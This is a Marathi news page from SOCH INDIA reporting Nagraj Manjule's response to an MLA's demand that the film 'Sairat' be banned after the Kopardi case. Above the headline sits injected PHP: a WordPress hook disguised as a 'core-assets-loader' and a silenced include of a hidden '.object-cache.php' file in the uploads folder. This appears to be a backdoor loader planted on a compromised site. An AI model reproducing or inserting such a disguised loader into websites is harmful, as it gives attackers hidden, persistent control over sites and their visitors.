add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सैराटवर ज्यांना बंदी घालायचीये त्यांनी घालावी – नागराज मंजुळे – SOCH INDIA
Menu

मनोरंजन
सैराटवर ज्यांना बंदी घालायचीये त्यांनी घालावी – नागराज मंजुळे

nobanner

कोपर्डी येथील बलात्कार आणि हत्या प्रकरणानंतर भाजपच्या आमदार मनीषा चौधरी यांनी सैराटसारख्या चित्रपटांवर बंदी घालण्याची मागणी केलीये. या चित्रपटाच्या माध्यमातून हे प्रकार वाढत असल्याचे त्यांनी म्हटलेय

दरम्यान, सैराटवर बंदी घालण्याच्या आमदार चौधरींच्या मागणीवर प्रतिक्रिया देताना नागराज मंजुळे म्हणाले, सैराट हा आता माझा भाग राहिलेला नाही. ज्यांना बंदी घालायची आहे त्यांनी घालावी. ज्यांना बघायचा आहे त्यांनी बघावा.

चित्रपटावर बंदी घालून जग सुधारले असते तर मग किती बदलले असते. त्यामुळे ज्यांनी हे वक्तव्य केलं त्यांनी जरुर याचा विचार करावा तसेच ज्यांनी त्यांचे बोलणे ऐकले त्यांनीही यावर जरुर विचार करावा, असे मंजुळे यावेळी म्हणाले.